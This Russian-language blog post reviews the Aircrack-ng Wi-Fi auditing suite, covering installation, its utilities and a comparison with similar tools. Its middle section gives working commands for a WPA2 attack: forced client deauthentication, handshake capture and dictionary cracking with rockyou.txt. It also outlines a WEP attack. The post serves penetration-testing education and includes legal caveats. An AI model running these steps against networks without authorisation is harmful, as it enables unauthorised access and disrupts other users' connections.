Aircrack-ng — легенда Wi-Fi-хакерства: полный обзор, установка и примеры

Aircrack-ng — легенда Wi-Fi-хакерства: полный обзор, установка и примеры
p>Если вы когда-нибудь интересовались, как взламывают Wi-Fi, наверняка слышали про Aircrack-ng. Это не просто программа — это целая экосистема утилит, заточенных под мониторинг, захват и взлом беспроводных сетей. От кафе с забытым паролем до масштабных тестов безопасности в корпорациях — Aircrack-ng везде на своём месте.

В этой статье разберём, что такое Aircrack-ng, как его установить (и под Windows, и под Linux), какие режимы атак он поддерживает, и почему в 2025 году его всё ещё обожают пентестеры. А ещё покажу рабочие примеры, как захватить хэндшейк и расшифровать пароль. Но только для учебных целей, конечно же!

Что такое Aircrack-ng

Aircrack-ng — это набор инструментов с открытым исходным кодом для аудита Wi-Fi-сетей. Программа позволяет:

  • Анализировать трафик в режиме мониторинга
  • Перехватывать пакеты и рукопожатия
  • Атаковать WEP и WPA/WPA2-PSK
  • Подделывать пакеты, усиливая трафик
  • Обнаруживать скрытые точки доступа
  • Взаимодействовать с GPS и картографией Wi-Fi

Aircrack-ng особенно популярен в Kali Linux, но его можно установить почти в любую Unix-подобную систему, включая macOS. Даже Windows, как ни странно, может — правда, с ограничениями.

Установка Aircrack-ng

Linux (Ubuntu/Debian/Kali)

На Kali установлен по умолчанию. Если нет — команда ниже:

 sudo  apt  update sudo apt install aircrack-ng 

Arch Linux

 sudo pacman -S aircrack-ng 

macOS (через Homebrew)

 brew install aircrack-ng 

Обратите внимание: для мониторинга и инъекций macOS мало пригоден. Лучше использовать внешнюю Wi-Fi-карту и Linux в виртуалке.

Windows

Есть сборки для Windows, но:

  • Не все Wi-Fi карты поддерживают режим мониторинга
  • Нужны драйверы с поддержкой NDIS
  • Никаких инъекций — только пассивный сбор

Загрузить можно с официального сайта: aircrack-ng.org

Рекомендация: используйте VirtualBox с Kali Linux + USB Wi-Fi адаптер (поддерживающий режим мониторинга и инъекций). Например, Alfa AWUS036NHA — проверенная классика.

Ключевые утилиты внутри Aircrack-ng

  • airmon-ng — включает мониторинг
  • airodump-ng — перехват пакетов
  • aireplay-ng — инъекции (деаутентификация, replay и т.д.)
  • aircrack-ng — расшифровка хэшей (WEP/WPA-PSK)
  • airbase-ng — фейковая точка доступа
  • airdecap-ng — расшифровка захваченного трафика

Все они работают в консоли и дружат друг с другом. Ручное управление — это кайф. Да, порог входа чуть выше, чем в GUI-инструментах, зато вы знаете, что происходит.

Пример: атака на WPA2 с перехватом рукопожатия

Предположим, у вас есть Wi-Fi с WPA2. Цель: захватить рукопожатие (handshake), когда кто-то подключается, и попытаться подобрать пароль.

1. Включаем режим мониторинга

 sudo airmon-ng start wlan0 

2. Запускаем перехват

 sudo airodump-ng wlan0mon 

Запоминаем BSSID цели и канал (CH). Пример:

  • BSSID: AA:BB:CC:DD:EE:FF
  • Канал: 6

3. Фиксируем цель

 sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon 

4. Форсируем отключение клиента (деаутентификация)

 sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon 

Ждём подключения клиента и захвата handshake. Если повезёт — через несколько секунд он будет в .cap-файле.

5. Взламываем пароль с помощью словаря

 aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture.cap 

Если пароль в словаре — получите его в чистом виде. Если нет — пора искать лучше словарь.

Атака на WEP (да, всё ещё бывает)

WEP считается давно мёртвым, но иногда его всё ещё можно встретить на забытых роутерах. В этом случае Aircrack-ng — король. Принцип прост:

  1. Перехватываете IV-пакеты с airodump-ng
  2. Усиливаете поток с aireplay-ng (fake-auth и ARP replay)
  3. Накопив 10k–100k пакетов, запускаете aircrack-ng

Весь процесс может занять от пары минут до получаса — всё зависит от активности в сети.

Сравнение с другими инструментами

Инструмент Функции Минусы
Aircrack-ng Мониторинг, захват, взлом WEP/WPA CLI, требует знания сетей
Wifite Автоматизация на базе Aircrack-ng Меньше контроля
Bettercap MITM + анализ Wi-Fi Больше про сниффинг, чем взлом

Практические советы

  • Используйте внешние Wi-Fi адаптеры с поддержкой инъекций (чипсет Atheros/Realtek)
  • Собирайте только на своём оборудовании — всё остальное незаконно
  • Проверяйте свои сети на устойчивость к простым атакам
  • Храните словари на SSD — это ускоряет взлом WPA

Выводы

Aircrack-ng — это не игрушка, а настоящая лаборатория по безопасности Wi-Fi. Он требует понимания сетей, но даёт в руки мощнейший инструментарий. Его главные плюсы — гибкость, скорость и отсутствие «магии» за кулисами: всё под контролем, всё видно.

Если вы хотите по-настоящему понять, как работают Wi-Fi атаки — начните с Aircrack-ng. А когда разберётесь — можно автоматизировать процессы через Wifite, интегрировать в Bettercap или писать свои скрипты на Python. Главное — не забывайте, что эти знания налагают ответственность.

Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.

Реальные атаки. Эффективные решения. Практический опыт.

Standoff Defend* — это онлайн-полигон, где ты сможешь испытать себя. Попробуй себя в расследовании инцидентов и поборись за победу в конкурсе

*Защищать. Реклама. АО «Позитив Текнолоджиз», ИНН 7718668887

Юрий Кочетов

Здесь я делюсь своими не самыми полезными, но крайне забавными мыслями о том, как устроен этот мир. Если вы устали от скучных советов и правильных решений, то вам точно сюда.